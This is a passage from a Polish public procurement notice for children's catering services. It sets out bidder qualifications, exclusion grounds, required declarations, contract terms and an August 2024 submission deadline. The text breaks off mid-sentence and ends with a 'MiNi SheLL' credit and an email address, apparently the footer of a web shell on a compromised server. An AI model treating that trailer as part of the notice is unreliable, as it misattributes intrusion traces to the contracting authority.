zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów (art. 114):<br/>Wykonawca spełni warunek jeżeli wykaże, że posiada uprawnienia do wykonywania określonej<br/>działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania tj. posiada<br/>aktualne zezwolenia Stacji Sanitarno-Epidemiologicznej stwierdzające spełnienie wymagań<br/>higieniczno-zdrowotnych do żywienia zbiorowego oraz możliwości prowadzenia cateringu.<br/>c) sytuacji ekonomicznej lub finansowej (art. 115):<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>d) zdolności technicznej lub zawodowej (art. 116):<br/>Wykonawca spełni warunek, jeżeli wykaże, że: wykonał, a w przypadku świadczeń<br/>powtarzających lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, minimum 1 usługę żywienia dzieci lub<br/>młodzieży, w zakresie przygotowywania posiłków w ramach żywienia zbiorowego dzieci i<br/>młodzieży o łącznej wartości tych usług minimum 550.000,00 zł brutto, w przedszkolach, innych<br/>formach wychowania przedszkolnego, szkołach, z wyłączeniem szkół dla dorosłych, a także w<br/>placówkach systemu oświaty, o których mowa w art. 2 pkt 1 ustawy z dnia 14 grudnia 2016 r.<br/>Prawo oświatowe (t. j. Dz.U. z 2020 poz. 910 ze zm.). Usługi przygotowywania posiłków<br/>wykonywane w ramach jednej umowy traktuje się jak jedną usługę.<br/>e) Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej –<br/>dopuszcza łączne spełnianie warunków przez Wykonawców.<br/>f) Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia.<br/>g) Spełnia warunki w związku z art 7 ust 1 ustawy z dnia 13 kwietnia 2022 r o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz U z 2022 r poz 835) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki<br/>dowodowe. Oświadczenia i dokumenty, jakie zobowiązani są dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków<br/>udziału w postępowaniu oraz wykazania braku podstaw wykluczenia<br/>7.1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę, w stosunku, do którego zachodzi którakolwiek z<br/>okoliczności, o których mowa w art. 108 ustawy Pzp.<br/>1) Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 ustawy Pzp, jeżeli udowodni<br/>Zamawiającemu, że spełnił łącznie następujące przesłanki:<br/>- naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym<br/>postępowaniem, w tym poprzez zadośćuczynienie pieniężne,<br/>- wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem<br/>oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania,<br/>lub zamawiającym,<br/>- podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwom,<br/>wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:<br/>- zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy,<br/>- zreorganizował personel,<br/>- wdrożył system sprawozdawczości i kontroli,<br/>- utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów,<br/>- wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych<br/>regulacji lub standardów.<br/>2) Zamawiający ocenia, czy podjęte przez wykonawcę czynności, o których mowa w pkt. 7.1.1 są wystarczające do wykazania jego<br/>rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykonawcy. Jeżeli podjęte przez wykonawcę czynności, o których<br/>mowa w pkt. 7.1.1 nie są wystarczające do wykazania jego rzetelności, zamawiający wyklucza wykonawcę.<br/>7.2. Zamawiający nie przewiduje podstaw wykluczenia wskazanych w art. 109 ustawy Pzp.<br/>7.3. Do oferty (składanej na formularzu systemowym na platformie zamawiającego) sporządzonej w oparciu o Formularz oferty<br/>stanowiący Załącznik nr 1 do SWZ Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>- oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania, składane na<br/>podstawie art. 125 ust. 1 ustawy Pzp – zgodnie z Załącznikiem nr 2 do SWZ;<br/>- oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp, zgodnie z Załącznikiem nr 3 do SWZ;<br/>- Pełnomocnictwo, jeżeli ofertę podpisuje ustanowiony pełnomocnik lub inny dokument potwierdzający umocowanie do działania w<br/>imieniu danego podmiotu;<br/>- zobowiązanie podmiotu (Wykonawcy) udostępniającego zasoby oraz oświadczenie,<br/>- dokument wadium – jeśli dotyczy.<br/>7.4. Informacje zawarte w oświadczeniu, o którym mowa w pkt.7.3 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>7.5. Zamawiający nie przewiduje obowiązku składania podmiotowych środków dowodowych w trybie art. 274 ust. 1 ustawy Pzp.<br/>7.6. Na poświadczenie o braku podstaw do wykluczenia wynikające z art 7 ust 1 ustawy z dnia 13 kwietnia 2022 r o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz<br/>U z 2022 r poz 835) Wykonawca składa oświadczenie stanowiące załącznik nr 7.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Z<br/>postępowania o udzielenie zamówienia wyklucza się Wykonawcę, w stosunku, do którego<br/>zachodzi którakolwiek z okoliczności, o których mowa w art. 108 ustawy Pzp. - Wykonawca przedstawi<br/>stosowne oświadczenie<br/>Zamawiający nie przewiduje podstaw wykluczenia wskazanych w art. 109 ustawy Pzp</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta powinna zawierać następujące dokumenty w formie elektronicznej opatrzonej<br/>podpisem klasyfikowanym, zaufanym lub podpisem osobistym, przez osoby upoważnione:<br/>1) formularz ofertowy, zawierający wszystkie informacje zawarte we wzorze stanowiącym –<br/>Załącznik nr 1 do SWZ;<br/>2) Oświadczenie Wykonawcy/Podmiotu<br/>składane na podstawie art. 125 ustawy z dnia 11 września 2019 r. - Prawo zamówień<br/>publicznych<br/>dotyczące spełniania warunków udziału w postępowaniu<br/>oraz braku podstaw do wykluczenia z postępowania i Załącznik nr2;<br/>3) Oświadczenie<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>z art. 117 ust. 4 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych - Załącznik nr3;<br/>4) Oświadczenie Wykonawcy/Podmiotu składane na podstawie § 10 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od Wykonawcy<br/>dotyczące spełniania warunków udziału w postępowaniu - Załącznik nr 4;<br/>2. Wraz z ofertą Wykonawca winien złożyć:<br/>1) pełnomocnictwo udzielane osobom podpisującym ofertę lub inne dokumenty składane z<br/>ofertą, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z<br/>dokumentów rejestrowych lub bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca<br/>dostarczył dane umożliwiające dostęp do tych dokumentów - jeżeli dotyczy;<br/>2) pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - jeżeli dotyczy;<br/>3) zobowiązanie podmiotu trzeciego - jeżeli dotyczy;<br/>4) informację o złożeniu oferty, której wybór prowadzi do powstania u Zamawiającego obowiązku<br/>podatkowego zgodnie z przepisami o podatku od towarów i usług - jeżeli dotyczy;<br/>5) oświadczenie, z którego wynika, które usługi wykonują poszczególni wykonawcy - jeżeli<br/>dotyczy;<br/>6) uzasadnienie zastrzeżenia informacji stanowiącej tajemnicę przedsiębiorstwa - jeżeli dotyczy;<br/>7) dokumenty, z których wynika prawo do podpisania oferty.<br/>3. Ofertę należy sporządzić zgodnie z wymaganiami SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunków przez Wykonawców.<br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca<br/>nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności<br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 454-455 ustawy Pzp oraz wskazanym we wzorze umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-19 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na platformie e-zamówienia. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na platformie e-zamówienia, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-19 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie nie zostało podzielone na części. Każdy Wykonawca przedłoży tylko jedną ofertę, sam lub jako reprezentant<br/>spółki czy konsorcjum. Złożenie więcej niż jednej oferty przez jednego Wykonawcę spowoduje odrzucenie wszystkich jego<br/>ofert. Powody niedokonania podziału zamówienia na części:<br/> brak podziału na części nie wpływa na konkurencję,  brak podziału na części podyktowany jest względami ekonomicznymi.<br/>Niniejsze zamówienie

Creat By MiNi SheLL
Email: jattceo@gmail.com